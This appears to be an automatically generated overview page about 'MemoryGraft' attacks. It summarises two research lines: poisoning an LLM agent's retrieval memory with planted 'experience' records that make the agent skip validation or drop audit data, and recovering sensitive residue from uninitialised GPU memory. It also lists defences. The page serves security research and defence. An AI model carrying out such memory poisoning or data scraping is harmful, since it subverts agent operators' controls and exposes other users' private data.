Papers
Topics
Authors
Recent
2000 character limit reached

MemoryGraft Attack Overview

Updated 23 December 2025
  • MemoryGraft is an attack exploiting persistent memory vulnerabilities in both LLM agents (via RAG poisoning) and GPUs (via residual data recovery).
  • LLM attacks leverage poisoned experience retrieval to induce lasting behavioral drift, compromising trusted memory boundaries during inference.
  • GPU attacks exploit uninitialized device memory by reclaiming sensitive data through standard APIs, exposing significant risks in shared environments.

MemoryGraft refers to two distinct families of attacks exploiting weaknesses in modern long-term memory architectures: (1) persistent compromise of LLM agents via poisoned experience retrieval, and (2) recovery of sensitive data from GPU memory residues due to absent zero-initialization policies. Both lines of attack demonstrate critical failures in memory trust boundaries—inviting adversaries to implant or recover data stealthily, with long-term impact on security-sensitive infrastructure.

1. Trust Boundaries and Threat Models

MemoryGraft attacks originate from failures in isolating trusted computational cores from their own long-term storage—whether high-level semantic agent memory or low-level device memory. In LLM agents, the architecture is composed of a reasoning core (C\mathcal{C}) and a persistent retrieval-augmented generation (RAG) memory store (M\mathcal{M}) containing historical task/response pairs. In GPUs, device memory operates under allocation/free cycles without mandatory sanitization, leaving remnant data accessible to subsequent processes.

For LLM agent attacks, the adversary is limited to benign user-level channels (e.g., documentation uploads) and cannot directly manipulate internal memory or runtime parameters. The attack’s goal is persisted behavioral drift: ensuring that malicious “experience traces” remain resident and influential for future queries, escaping detection and surviving across agent lifecycles (Srivastava et al., 18 Dec 2025).

In the GPU context, the attacker operates without elevated privileges, leveraging standard APIs (OpenCL, CUDA) to reclaim uninitialized device memory freed by other processes or virtual machines. The attack is feasible in both multi-user OSes and shared cloud GPU scenarios, relying on hardware-level memory reuse policies (Zhou et al., 2016).

2. Attack Mechanisms and Pipelines

2.1 LLM Agent MemoryGraft

The LLM MemoryGraft attack unfolds in two core phases: poisoning ingestion and durable exploitation.

  • Poisoning Phase: The attacker prepares benign (Sbenign\mathcal{S}_{\text{benign}}) and malicious (Spoison\mathcal{S}_{\text{poison}}) seeds—pairs of queries and responses. Malicious response patterns π\pi (e.g., skipping validation, executing remote scripts) are crafted to closely resemble desired experience templates. Attackers embed runnable code blocks (e.g., in markdown notes) that, when executed by the agent’s ingestion pipeline, cause benign and poisoned seeds to be serialized as a new merged RAG store.
  • Retrieval and Behavioral Drift: The agent’s retrieval loop uses BM25 lexical and FAISS embedding similarity indices; union retrieval ensures that a single channel match suffices for seed surfacing. As the agent confronts future semantically similar tasks, its semantic imitation heuristic causes it to replicate high-level procedural skeletons—including unsafe or adversarial behaviors embedded in poisoned seeds. Behavioral drift, once induced, persists across sessions.

Algorithmic Summary:

  1. Ingestion: Construct and submit artifact embedding both benign and poisoned experience records.
  2. Persistence: Merge records into M\mathcal{M}'; verify that poisoned seeds surface after session reset.
  3. Retrieval/Drift: For new queries, measure the proportion of retrieved traces originating from Spoison\mathcal{S}_{\text{poison}}.

2.2 GPU MemoryGraft

In the GPU setting, the attack is predicated on the absence of device memory zeroing. The methodology includes:

  1. Mark and Scratch: The attacker allocates and releases all available device memory to establish a baseline state.
  2. Victim Execution: The legitimate victim process uses the GPU for sensitive computation/data handling and subsequently frees memory (or exits).
  3. Sniff and Reconstruct: The attacker allocates device memory regions matching the size and timing of the victim’s allocations, dumps raw device memory, and applies algorithmic post-processing (including FFT-based inference, pixel/layout analysis, and OCR where applicable) to reconstruct images, text, and matrices from memory remnants.

Key Heuristics: Block filtering (excluding all-0 or all-0xff blocks), pixel format inference, exploitation of spatial redundancy in images, and template matching for text and matrices.

3. Experimental Results and Quantitative Impact

3.1 LLM MemoryGraft (MetaGPT DataInterpreter, GPT-4o)

  • Seeds: 110 total (100 benign + 10 poisoned).
  • Evaluation: 12 hand-crafted analytical tasks.
  • Retrievals: 48 total, with 23 poisoned (PRP=234847.9%\mathrm{PRP} = \frac{23}{48} \approx 47.9\%).
  • Poisoned seeds represented only 9%\approx 9\% of M\mathcal{M} yet compromised nearly half of retrievals—demonstrating high impact with minimal attacker footprint.
  • Behavioral drift examples included agent code inserting unsafe manipulations (e.g., dropping audit columns, setting flags to bypass data validation) based on grafted records.

3.2 GPU MemoryGraft

  • Synthetic images: 100% recovery across scales from INRIA Holidays dataset, with noise tolerance (79.3% at high Gaussian noise levels).
  • Multi-user/VM experiments: Near-total recovery of image fragments; in cloud VM passthrough scenarios, 25/29 images fully recovered, and two partially.
  • Real-world applications: Sensitive information (e.g., Gmail inbox fragments, PDF text stripes, image editor contents, Matlab matrices) routinely recovered from GPU residue in commodity applications.

Representative Table: LLM Agent Retrieval Drift

Metric Value Note
Total Memories (nn) 110 100 benign, 10 poisoned
Queries (NN) 12 Hand-crafted evaluation tasks
Total Retrievals 48 Cumulative for all queries
Poisoned Retrievals 23 Occurrences of poisoned seeds
PRP (\%) 47.9 Poisoned seeds = 9\% of M\mathcal{M}, 47.9\% of retrievals

4. Mechanistic Insights and Security Implications

4.1 LLM Agents

  • Imitation Heuristic: The observed “semantic imitation heuristic” in MetaGPT is central: the agent faithfully replicates procedural structure from prior successful traces, making experience poisoning especially insidious.
  • Union Retrieval: Retrieval via both lexical (BM25) and embedding (FAISS) similarity creates a wide basin of attraction for poisoned seeds.
  • Stealth: MemoryGraft’s LLM attack differs from prompt injection (transient, immediately visible) and standard RAG poisoning (requires repeated triggers, often factual). Malicious traces in MemoryGraft are camouflaged within trusted memory, do not reside in the runtime prompt, and cause trigger-free, persistent drift.

4.2 GPUs

  • Absence of Memory Sanitization: Commodity GPU drivers (across major vendors) do not scrub device memory at free; consequently, bits remain intact and accessible to subsequent contexts.
  • Rapid Recovery: Practical attacks can be completed within milliseconds to seconds, with negligible performance impact and difficulty for user detection.

A plausible implication is that any architecture—agentic or hardware-level—relying on mutable, unsanitized memory for long-term performance optimization exposes a viable vector for durable compromise, even absent privileged access.

5. Countermeasures and Defense Proposals

5.1 LLM MemoryGraft Defenses

  • Cryptographic Provenance Attestation (CPA):
    • The agent signs (q,Rq)(q, R_q) via a secure enclave-held private key KprivK_{\mathrm{priv}}, including a signature σ=Sign(H(qRq),Kpriv)\sigma = \mathrm{Sign}(H(q\parallel R_q),\,K_{\mathrm{priv}}).
    • Only (query, response, signature) triples passing verification (Verify(H(qiRqi),σi,Kpub)\mathrm{Verify}(H(q_i\parallel R_{q_i}),\sigma_i,K_{\mathrm{pub}})) are permitted for retrieval, precluding attacker-forged traces.
  • Constitutional Consistency Reranking:
    • Each retrieved response RiR_i is scored for risk relative to a pre-defined safety constitution C\mathcal{C}.
    • Combined scoring function S(q,qi)=αsimemb(q,qi)βLrisk(RiC)S(q, q_i) = \alpha\,\mathrm{sim}_{\mathrm{emb}}(q, q_i) - \beta\,\mathcal{L}_{\mathrm{risk}}(R_i\mid\mathcal{C}); traces exceeding risk threshold are suppressed.

5.2 GPU MemoryGraft Defenses

  • Mandatory Zero-Scrubbing: Device drivers must ensure all freed memory is zeroed prior to reuse, ideally with hardware acceleration to mitigate performance degradation.
  • Context/VM Switch Sanitization: Enforce routine flushing of device memory during context or virtual machine transitions.
  • Encryption-at-Rest: Assign process/VM-specific memory encryption keys, rotating as contexts change to prevent data remnants being decipherable by new tenants.
  • Developer Hygiene: Applications should explicitly clear sensitive GPU buffers before releasing memory.
  • Auditor Tools: Systematic memory scans to detect and report sensitive residue in device memory spaces.

MemoryGraft distinguishes itself from transient prompt injection and classical memory scraping. In the LLM agent context, it is notable for its session-persistent, triggerless behavioral compromise achieved via poisoned demonstrations and exploitation of RAG-based experience retrieval (Srivastava et al., 18 Dec 2025). In the device memory domain, MemoryGraft reveals a distinct class of cross-context leakage with demonstrated applicability in both desktop and virtualized GPU environments (Zhou et al., 2016).

Both forms highlight a broader principle: the durability and subtlety of attacks that operate at the boundaries between trusted computation and mutable, historically accumulated state. This suggests that persistent memory—whether semantic experiences or hardware device areas—demands robust provenance, isolation, and sanitization advancements to counteract the latent attack surfaces they expose.

Definition Search Book Streamline Icon: https://streamlinehq.com
References (2)

Whiteboard

Topic to Video (Beta)

Follow Topic

Get notified by email when new papers are published related to MemoryGraft Attack.